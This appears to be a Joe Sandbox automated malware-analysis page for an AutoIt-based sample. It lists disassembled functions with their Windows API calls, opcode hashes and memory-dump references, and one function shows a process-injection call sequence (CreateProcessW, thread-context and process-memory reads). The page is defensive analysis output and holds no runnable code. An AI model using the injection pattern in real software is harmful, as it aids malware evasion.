Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 316009f0687996d1eaaa3122172d073d2b05d97ef0b6364fec598dabbcdac24a
Instruction ID: 72a62bacf676a461cae11c837dd2ddb8de865da31a3f721c76d58b4d254fa783
Opcode Fuzzy Hash: 316009f0687996d1eaaa3122172d073d2b05d97ef0b6364fec598dabbcdac24a
Instruction Fuzzy Hash: EFD05EB6500328A7DB30A7A4AC4EFCF3A6CDB04751F4002A1BA55E2091DEF49985CAD0

Function 00C17F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C182F5
TerminateProcess.KERNEL32(00000000), ref: 00C182FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00C184DD

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 49d25cc29b9075a9da5c3fc437cfa7089dea2f01f9cbb48206758c21e0627789
Instruction ID: 6e225fe8e14a39c52b0bec4d5b82ae1ef18e72f745ba27fb90a4a6cce7d89fac
Opcode Fuzzy Hash: 49d25cc29b9075a9da5c3fc437cfa7089dea2f01f9cbb48206758c21e0627789
Instruction Fuzzy Hash: 28126B719083419FC714DF28C484B6ABBE5FF89314F14895DE8998B292DB31ED89CF92

Function 00BC5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44eeb489c2e1e0a0185c8d35d0a9075eb02f41241b9b5d0c4f039b71f8db7a92
Instruction ID: adafdf42b002d617d080a149d76e52bbf4d0fcce2591e093a7b1d99705208d56
Opcode Fuzzy Hash: 44eeb489c2e1e0a0185c8d35d0a9075eb02f41241b9b5d0c4f039b71f8db7a92
Instruction Fuzzy Hash: 12517C75A0060AABCB309FA5C985FFFBFF8EF45310F14009EF405A7291D6B1A9818B61

Function 00B910F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B91BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B91BF4
Part of subcall function 00B91BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B91BFC
Part of subcall function 00B91BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B91C07
Part of subcall function 00B91BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B91C12
Part of subcall function 00B91BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B91C1A
Part of subcall function 00B91BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B91C22

Part of subcall function 00B91B4A: RegisterWindowMessageW.USER32(00000004,?,00B912C4), ref: 00B91BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B9136A
OleInitialize.OLE32 ref: 00B91388
CloseHandle.KERNEL32(00000000,00000000), ref: 00BD24AB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 2248446536e0d61d8def1407d52ec7231a08cf67089d7115241be9f42104f15d
Instruction ID: 0850baa7d9b1f14abb92f30b4c66e9adefc8559e21b8dc60d0f821286d504639
Opcode Fuzzy Hash: 2248446536e0d61d8def1407d52ec7231a08cf67089d7115241be9f42104f15d
Instruction Fuzzy Hash: BD71CDB49152418ECBA4EF7BA88576DBAE0FB8834631D856ADC0BC72A1EBB04441DF45

Function 00BC86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00BC85CC,?,00C58CC8,0000000C), ref: 00BC8704
GetLastError.KERNEL32(?,00BC85CC,?,00C58CC8,0000000C), ref: 00BC870E
__dosmaperr.LIBCMT ref: 00BC8739

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 9ef077339b5e90f15c19f9aaaacda62c7edd029f89e3290073d3f4d429242fde
Instruction ID: 23534c35393a77f8f0b11c2064b7c7f65937671dc90ce414315742b91966a29d
Opcode Fuzzy Hash: 9ef077339b5e90f15c19f9aaaacda62c7edd029f89e3290073d3f4d429242fde
Instruction Fuzzy Hash: F1012B3260566027D63463346885F7F67C98BC1778F3902EEF8599B1D2DEA0ACC28194

Function 00C02FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00C02CD4,?,?,?,00000004,00000001), ref: 00C02FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C02CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C03006
CloseHandle.KERNEL32(00000000,?,00C02CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C0300D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: e4cba671af21bac4b81ea267721631b89ea8c435acf88ff8b9ad0c0b50f350f6
Instruction ID: a91c81255dd63e5da1ed7cc384d82d1c82e817f509b8ec539d85b5057a4d3950
Opcode Fuzzy Hash: e4cba671af21bac4b81ea267721631b89ea8c435acf88ff8b9ad0c0b50f350f6
Instruction Fuzzy Hash: 45E0863629131077D6301755BC4EFCF3A1CD786F75F104210F729750D046A0161282A8

Function 00BA1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00BA17F6

Strings

CALL, xrefs: 00BA17C6

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 97ded5cc8b26a146e3c5b3239fde94d654d73c015bbfc25445b94ec9cc920ce7
Instruction ID: 21f4aee7281d2f8b278a0d5b3a63ba43b572e124189e58b590545487c6d2795d
Opcode Fuzzy Hash: 97ded5cc8b26a146e3c5b3239fde94d654d73c015bbfc25445b94ec9cc920ce7
Instruction Fuzzy Hash: 11229A706082419FC754DF29C490B2ABBF1FF9A354F2489ADF4968B3A1D731E845CB92

Function 00C06EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C06F6B

Part of subcall function 00B94ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C06F5A, 00C06F63

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 6e3c3b13affa174383a065968c5ba6dd303e7221a3d94e4cb79cf1891df65530
Instruction ID: 42e4d94a19685c6eb91ddc5d25542e7c6db59e8786ad2bdb71c643da3b0230a6
Opcode Fuzzy Hash: 6e3c3b13affa174383a065968c5ba6dd303e7221a3d94e4cb79cf1891df65530
Instruction Fuzzy Hash: DEB171315182019FCF18EF24C49196EB7E5BF94714F0489ADF496972A2EF30EE49CB92

Function 00B92DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00BD2C8C

Part of subcall function 00B93AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B93A97,?,?,00B92E7F,?,?,?,00000000), ref: 00B93AC2

Part of subcall function 00B92DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B92DC4

Strings

X, xrefs: 00BD2C5A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 848e2ffbe592dd2f699b98c2cba03a3d1a0da8bf7c4c7590fc722925c0adc621
Instruction ID: adc5c50fd6277e240a702d8966cffbd0c55eb111692679d291ff8ee2498ab011
Opcode Fuzzy Hash: 848e2ffbe592dd2f699b98c2cba03a3d1a0da8bf7c4c7590fc722925c0adc621
Instruction Fuzzy Hash: 0321C671A10258AFDF01DF94C845BEE7BF8DF48305F4040AAE405A7341EBB459898B61

Function 00C02557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C02587

Strings

EA06, xrefs: 00C025B9

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: ef82d2cb7dfa41f81f5290e0094cd94cca8fae30bdd988914088754e1324a0a9
Instruction ID: 7a564b93bcaece6c5fa9c77dbf36b2c1e43e076b9fa569db0e0d402431f879e5
Opcode Fuzzy Hash: ef82d2cb7dfa41f81f5290e0094cd94cca8fae30bdd988914088754e1324a0a9
Instruction Fuzzy Hash: A401B5729042587EDF18C7A8CC5AEFEBBF8DB05301F00459AE592D21C1E5B4E708CB60

Function 00BCC9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00BC2D74: GetLastError.KERNEL32(?,?,00BC5686,00BD3CD6,?,00000000,?,00BC5B6A,?,?,?,?,?,00BBE6D1,?,00C58A48), ref: 00BC2D78
Part of subcall function 00BC2D74: _free.LIBCMT ref: 00BC2DAB
Part of subcall function 00BC2D74: SetLastError.KERNEL32(00000000,?,?,?,?,00BBE6D1,?,00C58A48,00000010,00B94F4A,?,?,00000000,00BD3CD6), ref: 00BC2DEC
Part of subcall function 00BC2D74: _abort.LIBCMT ref: 00BC2DF2

Part of subcall function 00BCCADA: _abort.LIBCMT ref: 00BCCB0C
Part of subcall function 00BCCADA: _free.LIBCMT ref: 00BCCB40

Part of subcall function 00BCC74F: GetOEMCP.KERNEL32(00000000), ref: 00BCC77A

_free.LIBCMT ref: 00BCCA33
_free.LIBCMT ref: 00BCCA69

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: d61b81974f558793f8ca78772fb941353d9f93b014a0c22776f2e2d45b6f909e
Instruction ID: 130dd57e84f759fb7988bb029f9aa730ae828987cdf861c07aede2d249c5dfbe
Opcode Fuzzy Hash: d61b81974f558793f8ca78772fb941353d9f93b014a0c22776f2e2d45b6f909e
Instruction Fuzzy Hash: 3131B131900208AFDB11EBA8D485FAD7BF4EF60321F2501DDF8089B2A2EB719E41CB50

Function 00B93837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B93908

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: a28647276030f54b6d48fd9510b6c1a6fdacfe12b7b619c9ac05da62cf9085d0
Instruction ID: 2b9aeb459d0586cc3b0822f6e843de3ed3dd9dc98aae073a74382ba356e71815
Opcode Fuzzy Hash: a28647276030f54b6d48fd9510b6c1a6fdacfe12b7b619c9ac05da62cf9085d0
Instruction Fuzzy Hash: BC3193705043019FD720DF25D8847ABBBE4FB49719F04097EFA9A87350E7B1AA44CB92

Function 00B96D9E Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00BACF58,?,?,?), ref: 00B96DBA
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00BACF58,?,?,?), ref: 00B96DED

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 14a820992bee15e1ba5264b9d4afca1d434dc1ec2b68dc4657f5edda9f574905
Instruction ID: 2038f4d31fb63ed88c53812a7ec4658bd30a215bc2107ec2247f3e9750b40a91
Opcode Fuzzy Hash: 14a820992bee15e1ba5264b9d4afca1d434dc1ec2b68dc4657f5edda9f574905
Instruction Fuzzy Hash: 2A01F2713082007FEF295BA9DC8BFBF7AEDDB86340F0000BDB106D61E1E9A19C008664

Function 00B9B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00B9BB4E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: fb0de01cf8ce54337836f29abd2b0d3b00d5f785185e6262ec0be4b71332649a
Instruction ID: 2886a5b8a5aa5e2536dda316a43ed533a2a2553bd77541658a4f924716c84937
Opcode Fuzzy Hash: fb0de01cf8ce54337836f29abd2b0d3b00d5f785185e6262ec0be4b71332649a
Instruction Fuzzy Hash: A3328B70A002499FDF24DF55D994FBEB7F9EB48300F1480A9E915AB261C7B8ED81CB91

Function 0334129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03341A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03341AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03341B13

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
Instruction ID: 04ecba598ff5880aab4d10c6edc6ba40c5770779a2566e921189cbd32ad918ca
Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
Instruction Fuzzy Hash: 5112DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A5FC1CB5A

Function 00B94ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B94E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B94EDD,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94E9C
Part of subcall function 00B94E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B94EAE
Part of subcall function 00B94E90: FreeLibrary.KERNEL32(00000000,?,?,00B94EDD,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94EC0

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94EFD

Part of subcall function 00B94E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BD3CDE,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94E62
Part of subcall function 00B94E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B94E74
Part of subcall function 00B94E59: FreeLibrary.KERNEL32(00000000,?,?,00BD3CDE,?,00C61418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B94E87

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 773c07044268b07f9aee3d2eade907a130e322061baa50a6dea56cc483ec8164
Instruction ID: fb4845687d058b1dd3b884449c880c6074a8ab81f95c74cab4355526d36e1040
Opcode Fuzzy Hash: 773c07044268b07f9aee3d2eade907a130e322061baa50a6dea56cc483ec8164
Instruction Fuzzy Hash: 7711C132610206ABCF24AB60DC42FED77E5AF50B50F20847AF546A61D2EF709A069750

Function 00BC8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00BC8440

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 62ac1ce606520b9897f63cbc471caf214bf617fafac37270619ae1915fe49a30
Instruction ID: bc0c369fdc204c6dd403e65672ce667878983841455971192500af5440a475e1
Opcode Fuzzy Hash: 62ac1ce606520b9897f63cbc471caf214bf617fafac37270619ae1915fe49a30
Instruction Fuzzy Hash: 6111187590410AAFCB19DF58E941E9E7BF5EF48314F1540A9F808AB312DA31DA11CBA5

Function 00BBE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: a87889b1333a172c64af22d7d0d1ba42006bb2a93e46d06675a82d8705fcbe1f
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: DBF0F432510A149BC6313A699C05FFA37D89F52335F1007E9F872922E2DBF4D80186A6

Function 00BC3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00C61444,?,00BAFDF5,?,?,00B9A976,00000010,00C61440,00B913FC,?,00B913C6,?,00B91129), ref: 00BC3852

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

